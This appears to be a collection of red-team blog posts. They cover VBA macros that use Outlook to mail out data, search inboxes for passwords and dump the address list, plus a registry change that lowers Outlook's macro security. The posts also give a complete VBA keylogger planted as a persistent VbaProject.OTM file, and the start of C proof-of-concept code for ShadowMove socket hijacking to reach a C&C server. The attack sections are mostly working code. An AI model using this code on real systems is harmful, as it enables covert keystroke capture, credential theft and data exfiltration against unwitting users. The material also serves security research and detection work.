In case you want to retrieve a field that is a pointer, you can directly copy its value to a LongLong or LongPtr variable (this also applies to other numeric values like sizes, you only need to pick the appropriate variable type).
Dim pointer As LongPtr
Call CopyMemory(VarPtr(pointer), VarPtr(something(144)), 8)
Keeping the value inside a LongPtr instead of a byte array makes it easier to use later (to do arithmetic or to pass it as a function argument).
If a function returns an LPSTR or LPWSTR and we need to use it in the VBA itself, we copy its value to a byte array as before, but this time we calculate the string size using lstrlenA() or lstrlenW(). Then, if the string is ANSI, we use StrConv(array, vbUnicode). There is a good example in this post:
'Converting an LPSTR (ANSI) String Pointer to a VBA String
Private Declare PtrSafe Function lstrlenA Lib "kernel32.dll" (ByVal lpString As LongPtr) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" _
(ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
Public Function StringFromPointerA(ByVal pointerToString As LongPtr) As String
Dim tmpBuffer() As Byte
Dim byteCount As Long
Dim retVal As String
' determine size of source string in bytes
byteCount = lstrlenA(pointerToString)
If byteCount > 0 Then
' Resize the buffer as required
ReDim tmpBuffer(0 To byteCount - 1) As Byte
' Copy the bytes from pointerToString to tmpBuffer
Call CopyMemory(VarPtr(tmpBuffer(0)), pointerToString, byteCount)
End If
' Convert (ANSI) buffer to VBA string
retVal = StrConv(tmpBuffer, vbUnicode)
StringFromPointerA = retVal
End Function
'Converting an LPWSTR (Unicode) String Pointer to a VBA String
Private Declare PtrSafe Function lstrlenW Lib "kernel32.dll" (ByVal lpString As LongPtr) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" _
(ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
Public Function StringFromPointerW(ByVal pointerToString As LongPtr) As String
Const BYTES_PER_CHAR As Integer = 2
Dim tmpBuffer() As Byte
Dim byteCount As Long
' determine size of source string in bytes
byteCount = lstrlenW(pointerToString) * BYTES_PER_CHAR
If byteCount > 0 Then
' Resize the buffer as required
ReDim tmpBuffer(0 To byteCount - 1) As Byte
' Copy the bytes from pointerToString to tmpBuffer
Call CopyMemory(VarPtr(tmpBuffer(0)), pointerToString, byteCount)
End If
' Straight assignment Byte() to String possible - Both are Unicode!
StringFromPointerW = tmpBuffer
End Function
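The only real difference between the two helpers is how the byte count is derived: a wide string is measured in 2-byte units, so the count has to be doubled before copying. A small portable C sketch of the wide case follows; sketch_wcs_units and sketch_copy_wide are hypothetical names, and uint16_t stands in for WCHAR.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Count the 16-bit units before the terminating NUL (a character count, not a byte count). */
size_t sketch_wcs_units(const uint16_t *s)
{
    assert(s != NULL);
    size_t n = 0;
    while (s[n] != 0)
        n++;
    return n;
}

/* Copy the string bytes without the terminator; *byte_count receives units * 2. */
unsigned char *sketch_copy_wide(const uint16_t *s, size_t *byte_count)
{
    *byte_count = sketch_wcs_units(s) * sizeof(uint16_t);
    /* Allocate at least one byte so an empty string still returns a valid block. */
    unsigned char *buf = malloc(*byte_count > 0 ? *byte_count : 1);
    if (buf != NULL)
        memcpy(buf, s, *byte_count);
    return buf;
}
```

Forgetting the multiplication copies only half of the string, which is an easy mistake to make when switching between the A and W variants of an API.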
This article is just an addendum to our previous article “Hacking in an epistolary way”. We wanted to share a few tricks to help others build their own macros.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is the last chapter of our trilogy about our epistolary-daemonic relationship with VBA. This time we are going to talk about how to interact with Outlook from Excel using macros, and also we are going to release a PoC where we turn Outlook into a keylogger. Please, take a seat and listen to the story.
We promise this is the last time @TheXC3LL will publish about VBA. We have scheduled an exorcism this weekend to release his daemons, so he can write again about vulnerabilities and other stuff different to VBA.
In our first chapter we talked about the concept of “Hacking in an epistolary way”, where we started to implement attacks and TTPs directly in VBA macros, avoiding process injections, dropping binaries or calling external programs that are flagged (like PowerShell). This time we are going to shift our focus to Outlook.
First of all we have to say that you can interact with Outlook directly from other Microsoft Office apps via VBA using the object Outlook.Application. This means that we can abuse Outlook functionalities from within Excel, so we can look for confidential information inside the inbox or we can exfiltrate data via mails. To send a mail only a few lines are needed:
'https://docs.microsoft.com/es-es/office/vba/api/outlook.namespace
Sub send_mail_example()
Dim xOutApp As Object
Dim xOutMail As Object
Dim xMailBody As String
Set xOutApp = CreateObject("Outlook.Application")
Set xOutMail = xOutApp.CreateItem(0)
xMailBody = "You did it!"
On Error Resume Next
With xOutMail
.To = "[email protected]"
.CC = ""
.BCC = ""
.Subject = "Macro executed " & Environ("username")
.Body = xMailBody
.Send
End With
On Error GoTo 0
Set xOutMail = Nothing
Set xOutApp = Nothing
End Sub
If we do not want a copy in the “Sent” folder we can set the property DeleteAfterSubmit to True after we set the Body. This moves the mail directly to the Deleted folder, so it is a bit more stealthy. To fully eradicate the mail we need to locate it (as an item) inside the Deleted folder and then call the method Remove via MAPI.
The object Outlook.Application also gives us access to the MAPI namespace and all its methods. This is important because we can interact with the mailboxes without knowing the credentials. For example, we can use our macro to search for all the received mails that contain the word “password” in their body:
Sub retrieve_passwords()
Dim xOutApp As Object
Dim xOutMail As Object
Dim xMailBody As String
Set xOutApp = CreateObject("Outlook.Application")
Set outlNameSpace = xOutApp.GetNamespace("MAPI")
Set myTasks = outlNameSpace.GetDefaultFolder(6).Items
Dim i As Integer
i = 1
For Each olMail In myTasks
If (InStr(1, UCase(olMail.Body), "PASSWORD", vbTextCompare) > 0) Then
Cells(i, 1) = olMail.Body ' Here we are just showing the info in the Excel sheets, but you can exfiltrate it as we saw before ;D
i = i + 1
End If
Next
Set xOutMail = Nothing
Set xOutApp = Nothing
End Sub
Plaintext passwords inside mailboxes are probably one of the most common sins we see in our engagements. A macro of this kind aimed at the right target can give you the keys to Heaven.
Another interesting piece of information that we can get using MAPI is the Global Address List (GAL). In the address list we can find names, usernames, phone numbers, etc. Here we are just collecting usernames:
'https://www.excelcise.org/extract-outlook-global-address-list-details-with-vba/
Sub global_address_list()
Dim xOutApp As Object
Dim xOutMail As Object
Dim xMailBody As String
Set xOutApp = CreateObject("Outlook.Application")
Set outlNameSpace = xOutApp.GetNamespace("MAPI")
Set outlGAL = outlNameSpace.GetGlobalAddressList()
Set outlEntry = outlGAL.AddressEntries
On Error Resume Next
'loop through address entries and extract details
For i = 1 To outlEntry.Count
Set outlMember = outlEntry.Item(i)
If outlMember.AddressEntryUserType = olExchangeUserAddressEntry Then
Cells(i, 1) = outlMember.GetExchangeUser.Name
End If
Next i
Set xOutMail = Nothing
Set xOutApp = Nothing
End Sub
The main issue is that retrieving this information can take a really long time if the company is big (we are talking about ~5-10 minutes), so it is a bit impractical in a real scenario. However, both approaches can be executed inside Outlook via OTM files, as we will see below.
In recent years various persistence methods related to Outlook were released and implemented in the tool Ruler. These methods were based on the execution of VBA code via Custom Forms and Home Pages. Both attacks are now patched, so we have to move forward.
Recently Dominic Chell published the article A Fresh Outlook on Mail Based Persistence, where persistence is achieved by dropping a VbaProject.OTM file that is later loaded by Outlook. This is the path that we chose here. But instead of using a payload to get a shell or parasitize a process with our C2, we are going to create a keylogger in pure VBA :).
Outlook is one of the longest-running programs on an average office computer. It is launched at the beginning of the workday and is not closed until the worker leaves the office, so it makes sense to use it as a keylogger. The plan is quite simple: we need to build an Excel file that modifies the registry (so Outlook can execute macros freely) and drops the OTM file with our keylogger.
As the registry key is under HKEY_CURRENT_USER we do not need special privileges to modify the value. By default it is set to level 3 (“Notifications for digitally signed macros, all other macros disabled”), so we enable the loading and execution of macros by changing the value to 1 (“Enable all macros”):
Sub disable_macro_security()
Dim myWS As Object
Set myWS = VBA.CreateObject("WScript.Shell")
Dim name As String, value As Integer, stype As String
name = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Outlook\Security\Level"
value = 1
stype = "REG_DWORD"
myWS.RegWrite name, value, stype
End Sub
We use the Excel version (Application.Version) to calculate the right location of the key to be modified. After that the OTM file can be dropped to Environ("appdata") & "\Microsoft\Outlook\VbaProject.OTM" (it can be packed inside a resource or form, or fetched directly from the internet, then read, unpacked and dropped). This is nothing new: all the good ol’ techniques to drop files apply here, so let’s move on to the OTM contents and the keylogger.
For our keylogger we are going to use the function NtUserGetRawInputData, which is not documented on MSDN. But as usual: if something is not covered by Microsoft, go and check ReactOS. Luckily it is documented there:
DWORD APIENTRY NtUserGetRawInputData ( HRAWINPUT hRawInput,
UINT uiCommand,
LPVOID pData,
PUINT pcbSize,
UINT cbSizeHeader
)
Also we can see that it is exported by win32u.dll, so our definition in VBA will be:
Private Declare PtrSafe Function NtUserGetRawInputData Lib "win32u" (ByVal hRawInput As LongPtr, ByVal uiCommand As LongLong, ByRef pData As Any, ByRef pcbSize As Long, ByVal cbSizeHeader As Long) As LongLong
Our approach will be the well-known technique of creating a window with a callback to snoop messages until we get a WM_INPUT, and then using NtUserGetRawInputData to get the input data. To build the structures correctly (like RAWKEYBOARD) we can use offsetof as we described in our article Shedding light on creating VBA macros, so we can check the offset and size of each field and pick VBA types accordingly.
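For reference, this is roughly what that check looks like for the keyboard case, written as a portable C sketch instead of against the Windows headers. The sketch_ names are hypothetical, handles and WPARAM are modelled as uint64_t (x64 only), and only the keyboard view is mirrored: the real RAWINPUT holds a union of mouse, keyboard and HID data, so its total size is larger than the struct shown here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Mirror of RAWINPUTHEADER on x64. */
typedef struct {
    uint32_t dwType;
    uint32_t dwSize;
    uint64_t hDevice;   /* HANDLE */
    uint64_t wParam;    /* WPARAM */
} sketch_rawinputheader;

/* Mirror of RAWKEYBOARD: four 16-bit fields followed by two 32-bit fields. */
typedef struct {
    uint16_t MakeCode;
    uint16_t Flags;
    uint16_t Reserved;
    uint16_t VKey;
    uint32_t Message;
    uint32_t ExtraInformation;
} sketch_rawkeyboard;

/* Keyboard-only view of the data that arrives with WM_INPUT. */
typedef struct {
    sketch_rawinputheader header;
    sketch_rawkeyboard    keyboard;
} sketch_rawinput_keyboard;

static_assert(sizeof(sketch_rawinputheader) == 24, "header size (the cbSizeHeader value)");
static_assert(sizeof(sketch_rawkeyboard) == 16, "keyboard size");

/* Offset of the virtual-key code from the start of the returned buffer. */
size_t sketch_vkey_offset(void)
{
    return offsetof(sketch_rawinput_keyboard, keyboard)
         + offsetof(sketch_rawkeyboard, VKey);
}
```

With these numbers the virtual-key code sits 30 bytes into the buffer and the window message 32 bytes in, which is all the VBA side needs in order to pick its member types.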
Our macro has to be split in two parts: ThisOutlookSession and Keylogger. In ThisOutlookSession we only place the trigger that will execute our payload when Outlook starts:
Sub Application_Startup()
Keylogger.launcher
End Sub
We need to place the “real” payload inside another module to be allowed to use the AddressOf operator, because we use it to set the callback of our window class. The Keylogger module code follows (remember: this is just a PoC that does not handle errors/exceptions; the intention of this code is just to exemplify how to build one):
'This can be hidden using DispCallFunc trick
Private Declare PtrSafe Function RegisterClassEx Lib "user32" Alias "RegisterClassExA" (pcWndClassEx As WNDCLASSEX) As Integer
Private Declare PtrSafe Function CreateWindowEx Lib "user32" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As LongPtr, ByVal hMenu As LongPtr, ByVal hInstance As LongPtr, ByVal lpParam As LongPtr) As LongPtr
Private Declare PtrSafe Function DefWindowProc Lib "user32" Alias "DefWindowProcA" (ByVal hwnd As LongPtr, ByVal wMsg As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Private Declare PtrSafe Function GetMessage Lib "user32" Alias "GetMessageA" (lpMsg As MSG, ByVal hwnd As LongPtr, ByVal wMsgFilterMin As Long, ByVal wMsgFilterMax As Long) As Long
Private Declare PtrSafe Function TranslateMessage Lib "user32" (lpMsg As MSG) As Long
Private Declare PtrSafe Function DispatchMessage Lib "user32" Alias "DispatchMessageA" (lpMsg As MSG) As LongPtr
Private Declare PtrSafe Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function RegisterRawInputDevices Lib "user32" (ByRef pRawInputDevices As RAWINPUTDEVICE, ByVal uiNumDevices As Integer, ByVal cbSize As Integer) As Boolean
Private Declare PtrSafe Function NtUserGetRawInputData Lib "win32u" (ByVal hRawInput As LongPtr, ByVal uiCommand As LongLong, ByRef pData As Any, ByRef pcbSize As Long, ByVal cbSizeHeader As Long) As LongLong
Private Declare PtrSafe Function GetProcessHeap Lib "kernel32" () As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "kernel32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, ByVal dwBytes As LongLong) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Destination As Any, ByVal Source As LongPtr, ByVal Length As Long)
Private Declare PtrSafe Function HeapFree Lib "kernel32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, lpMem As Any) As Long
Private Declare PtrSafe Function GetForegroundWindow Lib "user32" () As LongPtr
Private Declare PtrSafe Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As LongPtr) As Long
Private Declare PtrSafe Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As LongPtr, ByVal lpString As LongPtr, ByVal cch As Long) As Long
Private Declare PtrSafe Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
Private Declare PtrSafe Function GetKeyboardState Lib "user32" (pbKeyState As Byte) As Long
Private Declare PtrSafe Function ToAscii Lib "user32" (ByVal uVirtKey As Long, ByVal uScanCode As Long, lpbKeyState As Byte, ByVal lpwTransKey As LongLong, ByVal fuState As Long) As Long
Private Declare PtrSafe Function MapVirtualKey Lib "user32" Alias "MapVirtualKeyA" (ByVal wCode As Long, ByVal wMapType As Long) As Long
Private Type WNDCLASSEX
cbSize As Long
style As Long
lpfnWndProc As LongPtr
cbClsExtra As Long
cbWndExtra As Long
hInstance As LongPtr
hIcon As LongPtr
hCursor As LongPtr
hbrBackground As LongPtr
lpszMenuName As String
lpszClassName As String
hIconSm As LongPtr
End Type
Private Type POINTAPI
x As Long
y As Long
End Type
Private Type MSG
hwnd As LongPtr
Message As Long
wParam As LongPtr
lParam As LongPtr
time As Long
pt As POINTAPI
End Type
Private Type RAWINPUTDEVICE
usUsagePage As Integer
usUsage As Integer
dwFlags As Long
hwndTarget As LongPtr
End Type
Private Type RAWINPUTHEADER
dwType As Long '0-4 = 4 bytes
dwSize As Long '4-8 = 4 Bytes
hDevice As LongPtr '8-16 = 8 Bytes
wParam As LongPtr '16-24 = 8 Bytes
End Type
Private Type RAWKEYBOARD
MakeCode As Integer '0-2 = 2 bytes
Flags As Integer '2-4 = 2 bytes
Reserved As Integer '4-6 = 2 bytes
VKey As Integer '6-8 = 2 bytes
Message As Long '8-12 = 4 bytes
ExtraInformation As Long '12-16 = 4 bytes
End Type
Private Type RAWINPUT
header As RAWINPUTHEADER
data As RAWKEYBOARD
End Type
Public oldTitle As String
Public newTitle As String
Public lastKey As Long
Public cleaner(0 To 255) As Byte
Private Function FunctionPointer(addr As LongPtr) As LongPtr
' https://renenyffenegger.ch/notes/development/languages/VBA/language/operators/addressOf
FunctionPointer = addr
End Function
'https://www.freevbcode.com/ShowCode.asp?ID=209
Public Function ByteArrayToString(bytArray() As Byte) As String
Dim sAns As String
Dim iPos As Long
sAns = StrConv(bytArray, vbUnicode)
iPos = InStr(sAns, Chr(0))
If iPos > 0 Then sAns = Left(sAns, iPos - 1)
ByteArrayToString = sAns
End Function
Public Sub launcher()
Dim hwnd As LongPtr
Dim mesg As MSG
Dim wc As WNDCLASSEX
Dim result As LongPtr
Dim HWND_MESSAGE As Long
'Some initialization for later
oldTitle = "AdeptsOf0xCC"
lastKey = 0
'First we need to set a window class
wc.cbSize = LenB(wc)
wc.lpfnWndProc = FunctionPointer(AddressOf WndProc) 'This code must be saved as a Module so that AddressOf can give us the location of our callback
wc.hInstance = GetModuleHandle(vbNullString)
wc.lpszClassName = "VBAHELLByXC3LL"
'Register our class
result = RegisterClassEx(wc)
'Create the window so we can snoop messages
HWND_MESSAGE = (-3&)
hwnd = CreateWindowEx(0, "VBAHELLByXC3LL", 0, 0, 0, 0, 0, 0, HWND_MESSAGE, 0&, GetModuleHandle(vbNullString), 0&)
End Sub
'Our callback
Private Function WndProc(ByVal lhwnd As LongPtr, ByVal tMessage As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Dim WM_CREATE As Long
Dim WM_INPUT As Long
Dim WM_KEYDOWN As Long
Dim WM_SYSKEYDOWN As Long
Dim VK_CAPITAL As Long
Dim VK_SCROLL As Long
Dim VK_NUMLOCK As Long
Dim VK_CONTROL As Long
Dim VK_MENU As Long
Dim VK_BACK As Long
Dim VK_RETURN As Long
Dim VK_SHIFT As Long
Dim RIDEV_INPUTSINK As Long
Dim RIM_TYPEKEYBOARD As Long
Dim rid(50) As RAWINPUTDEVICE
Dim RawInputHeader_ As RAWINPUTHEADER
Dim dwSize As Long
Dim fgWindow As LongPtr
Dim wSize As Long
Dim fgTitle() As Byte
Dim wKey As Integer
Dim result As Long
WM_CREATE = &H1
WM_INPUT = &HFF
WM_KEYDOWN = &H100
WM_SYSKEYDOWN = &H104
VK_CAPITAL = &H14
VK_SCROLL = &H91
VK_NUMLOCK = &H90
VK_CONTROL = &H11
VK_MENU = &H12
VK_BACK = &H8
VK_RETURN = &HD
VK_SHIFT = &H10
RIDEV_INPUTSINK = &H100
RIM_TYPEKEYBOARD = &H1&
'Check the message type and trigger an action if needed
Select Case tMessage
Case WM_CREATE ' Register us
rid(0).usUsagePage = &H1
rid(0).usUsage = &H6
rid(0).dwFlags = RIDEV_INPUTSINK
rid(0).hwndTarget = lhwnd
r = RegisterRawInputDevices(rid(0), 1, LenB(rid(0)))
Case WM_INPUT
Dim pbuffer() As Byte
Dim buffer As RAWINPUT
'First we get the size
r = NtUserGetRawInputData(lParam, &H10000003, vbNullString, dwSize, LenB(RawInputHeader_))
ReDim pbuffer(0 To dwSize - 1)
'And then we save the data
r = NtUserGetRawInputData(lParam, &H10000003, pbuffer(0), dwSize, LenB(RawInputHeader_))
If r <> 0 Then
'VBA hacky things to cast the data into a RAWINPUT struct
Call CopyMemory(buffer, VarPtr(pbuffer(0)), dwSize)
If (buffer.header.dwType = RIM_TYPEKEYBOARD) And ((buffer.data.Message = WM_KEYDOWN) Or (buffer.data.Message = WM_SYSKEYDOWN)) Then
'Check the window title to know where the key was sent
'We want to know if the title is the same, so when we add this info to our mail we don't paste a title per key
'Just one title and all the keys related ;)
fgWindow = GetForegroundWindow()
wSize = GetWindowTextLength(fgWindow) + 1
ReDim fgTitle(0 To wSize - 1)
r = GetWindowText(fgWindow, VarPtr(fgTitle(0)), wSize)
newTitle = ByteArrayToString(fgTitle)
If newTitle <> oldTitle Then
oldTitle = newTitle
End If
GetKeyState (VK_CAPITAL)
GetKeyState (VK_SCROLL)
GetKeyState (VK_NUMLOCK)
GetKeyState (VK_CONTROL)
GetKeyState (VK_MENU)
Dim lpKeyboard(0 To 255) As Byte
r = GetKeyboardState(lpKeyboard(0))
Select Case buffer.data.VKey
Case VK_BACK
exfil = exfil & "[<]"
Case VK_RETURN
exfil = exfil & vbNewLine
Case Else
'Something funny undocumented: ToAscii "breaks" the keyboard status, so we need to perform this shitty thing to "fix" it
'Dealing with deadkeys is a pain in the ass T_T (á, é, í, ó, ú...)
result = ToAscii(buffer.data.VKey, MapVirtualKey(buffer.data.VKey, 0), lpKeyboard(0), VarPtr(wKey), 0)
If result = -1 Then
lastKey = buffer.data.VKey
Do While ToAscii(buffer.data.VKey, MapVirtualKey(buffer.data.VKey, 0), lpKeyboard(0), VarPtr(wKey), 0) < 0
Loop
Else
If wKey < 256 Then
MsgBox Chr(wKey), 0, oldTitle
End If
If lastKey <> 0 Then
Call CopyMemory(lpKeyboard(0), VarPtr(cleaner(0)), 256)
result = ToAscii(lastKey, MapVirtualKey(buffer.data.VKey, 0), lpKeyboard(0), VarPtr(wKey), 0)
lastKey = 0
End If
End If
End Select
End If
End If
Case Else
WndProc = DefWindowProc(lhwnd, tMessage, wParam, lParam)
End Select
End Function
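The byte offsets annotated in the RAWINPUTHEADER and RAWKEYBOARD types above can be double-checked outside VBA. The following is only a minimal sketch: the struct names RawInputHeader64 and RawKeyboard64 and the helper assert_layout are hypothetical, and the fixed-width fields assume a 64-bit Office, where a VBA Long is 4 bytes and a LongPtr is 8 bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirrors of the VBA types, assuming 64-bit Office:
   Integer = 2 bytes, Long = 4 bytes, LongPtr = 8 bytes. */
typedef struct {
    uint32_t dwType;   /* Long    */
    uint32_t dwSize;   /* Long    */
    uint64_t hDevice;  /* LongPtr */
    uint64_t wParam;   /* LongPtr */
} RawInputHeader64;

typedef struct {
    uint16_t MakeCode;          /* Integer */
    uint16_t Flags;             /* Integer */
    uint16_t Reserved;          /* Integer */
    uint16_t VKey;              /* Integer */
    uint32_t Message;           /* Long    */
    uint32_t ExtraInformation;  /* Long    */
} RawKeyboard64;

/* Aborts if any field does not sit at the offset written in the VBA comments. */
void assert_layout(void)
{
    assert(offsetof(RawInputHeader64, dwType) == 0);
    assert(offsetof(RawInputHeader64, dwSize) == 4);
    assert(offsetof(RawInputHeader64, hDevice) == 8);
    assert(offsetof(RawInputHeader64, wParam) == 16);
    assert(offsetof(RawKeyboard64, MakeCode) == 0);
    assert(offsetof(RawKeyboard64, Flags) == 2);
    assert(offsetof(RawKeyboard64, Reserved) == 4);
    assert(offsetof(RawKeyboard64, VKey) == 6);
    assert(offsetof(RawKeyboard64, Message) == 8);
    assert(offsetof(RawKeyboard64, ExtraInformation) == 12);
}
```

If the header came out at any size other than 24 bytes, the value passed as cbSizeHeader would no longer match what the API expects, which is why picking the right VBA type for each field matters.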
After filling both modules we save the project and embed the VbaProject.OTM file inside our Excel document. The next time Outlook is started (after the Excel macro changes the registry and drops the OTM file), it will execute our malicious VBA code, turning Outlook into a keylogger. Of course, Outlook keeps working as usual.
Here we can see how it is getting the keys pressed in Remote Desktop (yep, the PoC uses MsgBox because it is Christmas and we are lazy, you can change it to send you the keys via mail as was shown before ;D)
And the trilogy ends. No more VBA for a while, we promise!
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is a how-to on hiding your sinful connections inside connections made by legitimate programs using the ShadowMove technique. Please, take a seat and listen to the story.
This time we are going to show two crappy PoCs using ShadowMove to hide connections made by our offensive software. The first one is fully reliable, but the second has its own issues that must be solved if you are going to use it in a real operation. We’ll discuss those issues at the end of the post. That being said: enjoy the reading!
Edit 2021/02/03: Alex Ionescu contacted us via twitter to tell us that the “ShadowMove” technique was used previously by himself and @yarden_shafir. We provide here the link to their blog: Faxing Your Way to SYSTEM — Part Two
Edit 2021/02/03: One of the authors (@DissectMalware) contacted us via twitter to explain that their paper was accepted at USENIX 2020 in late 2019, prior to the “FaxHell” blog.
Edit 2021/02/03: Both researchers agreed that this was a classic collision between people researching the same topic. In our opinion everyone acted in good faith, but social networks tend to twist this kind of situation.
ShadowMove is a novel technique to hijack sockets from non-cooperative processes. It is described in the paper ShadowMove: A Stealthy Lateral Movement Strategy, presented at USENIX ’20. This technique takes advantage of the fact that AFD (Ancillary Function Driver) file handles are treated as socket handles by Windows APIs, so it is possible to duplicate them with WSADuplicateSocket().
The classic schema to hijack a socket from a non-cooperative process starts with a process injection in order to load our own logic to find and reuse the target socket. But with ShadowMove you do not have to inject anything: it only requires opening a process handle with PROCESS_DUP_HANDLE rights. No extra privileges, no noisy things.
With our shiny handle we can start duplicating all file handles until we find those named \Device\Afd, then just use getpeername() to check whether each one belongs to a connection with our target.
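The name check can be made stricter than a length test plus a look at three characters. The following is only a sketch under stated assumptions: is_afd_name is a hypothetical helper, and it assumes the object name arrives as a counted UTF-16 buffer (a pointer plus a length in bytes), which is how a UNICODE_STRING describes it.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns 1 when a counted UTF-16 name is exactly "\Device\Afd", 0 otherwise.
   length_in_bytes is the byte length of the name (2 bytes per UTF-16 unit). */
int is_afd_name(const uint16_t *name, size_t length_in_bytes)
{
    static const char expected[] = "\\Device\\Afd";  /* 11 characters */
    const size_t count = sizeof(expected) - 1;       /* drop the terminating NUL */

    assert(name != NULL);
    if (length_in_bytes != count * sizeof(uint16_t))
        return 0;                                    /* 11 * 2 = 22 bytes expected */
    for (size_t i = 0; i < count; i++) {
        if (name[i] != (uint16_t)(unsigned char)expected[i])
            return 0;
    }
    return 1;
}
```

Comparing the whole name avoids false positives from other 11-character object names that happen to end in the same three letters.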
Why is this technique interesting for a Red Team?
We are glad you asked! Recently we remembered a situation we had to face in an operation. We had to deploy our keylogger on a computer that blocked any connection made by non-whitelisted binaries. To circumvent this problem we just injected our keylogger into a process that was allowed to connect to the outside. But with ShadowMove we can avoid any noise potentially generated by our injections (yes, we can use all the usual suspects to bypass EDRs, but this method is cleaner by far).
Imagine we have a keylogger and we want to use ShadowMove to send the intercepted keys to our C&C. Every time we have to send a batch of keys we need to run a legitimate program that tries to connect to our C&C, for example an MSSQL client, and when the connection is made we have to hijack it from our keylogger. Of course, in an enterprise environment you would need to set up the connection through the corporate proxy instead of directly to the C&C, but let’s forget about that for a moment.
The recipe to ShadowMove is (taken directly from the paper):
This can be translated into the following PoC, which we called “ShadowMove Gateway”. Basically, we provide the PID of the process (remember: something legitimate, able to establish a connection with our C&C) and the IP of our C&C (remember: in a real scenario we have to deal with proxies).
// PoC of ShadowMove Gateway by Juan Manuel Fernández (@TheXC3LL)
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <winsock2.h>
#include <Windows.h>
#include <stdio.h>
#pragma comment(lib,"WS2_32")
// Most of the code is adapted from https://github.com/Zer0Mem0ry/WindowsNT-Handle-Scanner/blob/master/FindHandles/main.cpp
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
#define SystemHandleInformation 16
#define ObjectNameInformation 1
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* _NtDuplicateObject)(
HANDLE SourceProcessHandle,
HANDLE SourceHandle,
HANDLE TargetProcessHandle,
PHANDLE TargetHandle,
ACCESS_MASK DesiredAccess,
ULONG Attributes,
ULONG Options
);
typedef NTSTATUS(NTAPI* _NtQueryObject)(
HANDLE ObjectHandle,
ULONG ObjectInformationClass,
PVOID ObjectInformation,
ULONG ObjectInformationLength,
PULONG ReturnLength
);
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
BYTE ObjectTypeNumber;
BYTE Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG HandleCount;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef enum _POOL_TYPE
{
NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed,
DontUseThisType,
NonPagedPoolCacheAligned,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS
} POOL_TYPE, * PPOOL_TYPE;
typedef struct _OBJECT_NAME_INFORMATION
{
UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;
PVOID GetLibraryProcAddress(PSTR LibraryName, PSTR ProcName)
{
return GetProcAddress(GetModuleHandleA(LibraryName), ProcName);
}
SOCKET findTargetSocket(DWORD dwProcessId, LPSTR dstIP) {
HANDLE hProc;
PSYSTEM_HANDLE_INFORMATION handleInfo;
DWORD handleInfoSize = 0x10000;
NTSTATUS status;
DWORD returnLength;
WSAPROTOCOL_INFOW wsaProtocolInfo = { 0 };
SOCKET targetSocket;
// Open target process with PROCESS_DUP_HANDLE rights
hProc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwProcessId);
if (!hProc) {
printf("[!] Error: could not open the process!\n");
exit(-1);
}
printf("[+] Handle to process obtained!\n");
// Find the functions
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetLibraryProcAddress("ntdll.dll", "NtQuerySystemInformation");
_NtDuplicateObject NtDuplicateObject = (_NtDuplicateObject)GetLibraryProcAddress("ntdll.dll", "NtDuplicateObject");
_NtQueryObject NtQueryObject = (_NtQueryObject)GetLibraryProcAddress("ntdll.dll", "NtQueryObject");
// Retrieve handles from the target process
handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
while ((status = NtQuerySystemInformation(SystemHandleInformation, handleInfo, handleInfoSize, NULL)) == STATUS_INFO_LENGTH_MISMATCH)
handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
printf("[+] Found [%d] handlers in PID %d\n============================\n", handleInfo->HandleCount, dwProcessId);
// Iterate
for (DWORD i = 0; i < handleInfo->HandleCount; i++) {
// Check if it is the desired type of handle
if (handleInfo->Handles[i].ObjectTypeNumber == 0x24) {
SYSTEM_HANDLE handle = handleInfo->Handles[i];
HANDLE dupHandle = NULL;
